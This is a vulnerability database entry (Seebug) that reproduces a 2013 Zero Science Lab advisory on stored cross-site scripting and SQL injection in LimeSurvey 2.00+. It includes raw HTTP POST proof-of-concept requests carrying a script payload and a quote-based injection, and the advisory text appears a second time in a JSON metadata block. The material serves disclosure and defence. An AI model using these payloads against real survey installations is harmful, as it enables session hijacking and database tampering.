ID SSV:83270 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
?
LimeSurvey v2.00+ (build 131107) Script Insertion And SQL Injection Vulnerability
Vendor: LimeSurvey Project Team
Product web page: http://www.limesurvey.org
Affected version: 2.00+ build 131009
2.00+ build 131022
2.00+ build 131031
2.00+ build 131107
Summary: LimeSurvey (formerly PHPSurveyor) is a free and open source
on-line survey application written in PHP based on a MySQL, PostgreSQL
or MSSQL database, distributed under the GNU General Public License. As
a web server-based software it enables users to develop and publish on-line
surveys, and collect responses, without doing any programming.
Desc: LimeSurvey suffers from a stored cross-site scripting and SQL Injection
vulnerability. Input passed to the 'label_name' POST parameter is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an
affected site. Input passed to the 'group_name' POST parameter is not properly
sanitised before being used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.7
MySQL 5.5.25a
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5161
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5161.php
Vendor: http://www.limesurvey.org/en/stable-release
19.11.2013
--
XSS:
----------------------------------------------------------------------------------
POST /limesurvey/index.php/admin/labels/sa/process HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: joxypoxy/1.0
Connection: close
Referer: http://localhost/limesurvey/index.php/admin/labels/sa/newlabelset
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
Cookie: PHPSESSID=dqbs2pqhq9f2ckn24rreja1sl1
label_name=Zero+Science+Lab"<script>alert(document.cookie)</script>&additional_languages=he&action=insertlabelset&languageids=he&available_languages=am
----------------------------------------------------------------------------------
SQLi:
----------------------------------------------------------------------------------
POST /limesurvey/index.php/admin/usergroups/sa/add HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: joxypoxy/1.0
Connection: close
Referer: http://localhost/limesurvey/index.php/admin/usergroups/sa/add
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Cookie: PHPSESSID=dqbs2pqhq9f2ckn24rreja1sl1
group_name=Zero+Science+Lab'&action=usergroupindb
----------------------------------------------------------------------------------
{"href": "https://www.seebug.org/vuldb/ssvid-83270", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-83270", "cvelist": [], "description": "No description provided by source.", "viewCount": 4, "published": "2014-07-01T00:00:00", "sourceData": "\n ?\r\nLimeSurvey v2.00+ (build 131107) Script Insertion And SQL Injection Vulnerability\r\n\r\n\r\nVendor: LimeSurvey Project Team\r\nProduct web page: http://www.limesurvey.org\r\n\r\nAffected version: 2.00+ build 131009\r\n 2.00+ build 131022\r\n 2.00+ build 131031\r\n 2.00+ build 131107\r\n\r\nSummary: LimeSurvey (formerly PHPSurveyor) is a free and open source\r\non-line survey application written in PHP based on a MySQL, PostgreSQL\r\nor MSSQL database, distributed under the GNU General Public License. As\r\na web server-based software it enables users to develop and publish on-line\r\nsurveys, and collect responses, without doing any programming.\r\n\r\nDesc: LimeSurvey suffers from a stored cross-site scripting and SQL Injection\r\nvulnerability. Input passed to the 'label_name' POST parameter is not properly\r\nsanitised before being returned to the user. This can be exploited to execute\r\narbitrary HTML and script code in a user's browser session in context of an\r\naffected site. Input passed to the 'group_name' POST parameter is not properly\r\nsanitised before being used in SQL queries. This can be exploited to manipulate\r\nSQL queries by injecting arbitrary SQL code.\r\n\r\nTested on: Microsoft Windows 7 Ultimate SP1 (EN)\r\n Apache 2.4.2 (Win32)\r\n PHP 5.4.7\r\n MySQL 5.5.25a\r\n\r\n\r\nVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2013-5161\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5161.php\r\n\r\nVendor: http://www.limesurvey.org/en/stable-release\r\n\r\n\r\n\r\n19.11.2013\r\n\r\n--\r\n\r\n\r\nXSS:\r\n----------------------------------------------------------------------------------\r\n\r\nPOST /limesurvey/index.php/admin/labels/sa/process HTTP/1.1\r\nHost: localhost\r\nAccept: */*\r\nAccept-Language: en\r\nUser-Agent: joxypoxy/1.0\r\nConnection: close\r\nReferer: http://localhost/limesurvey/index.php/admin/labels/sa/newlabelset\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 151\r\nCookie: PHPSESSID=dqbs2pqhq9f2ckn24rreja1sl1\r\n\r\nlabel_name=Zero+Science+Lab"<script>alert(document.cookie)</script>&additional_languages=he&action=insertlabelset&languageids=he&available_languages=am\r\n\r\n----------------------------------------------------------------------------------\r\n\r\n\r\n\r\n\r\nSQLi:\r\n----------------------------------------------------------------------------------\r\n\r\nPOST /limesurvey/index.php/admin/usergroups/sa/add HTTP/1.1\r\nHost: localhost\r\nAccept: */*\r\nAccept-Language: en\r\nUser-Agent: joxypoxy/1.0\r\nConnection: close\r\nReferer: http://localhost/limesurvey/index.php/admin/usergroups/sa/add\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 49\r\nCookie: PHPSESSID=dqbs2pqhq9f2ckn24rreja1sl1\r\n\r\ngroup_name=Zero+Science+Lab'&action=usergroupindb\r\n\r\n----------------------------------------------------------------------------------\r\n\n ", "id": "SSV:83270", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T14:27:38", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2017-11-19T14:27:38", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T14:27:38", "rev": 2}, "vulnersScore": -0.1}, "references": []}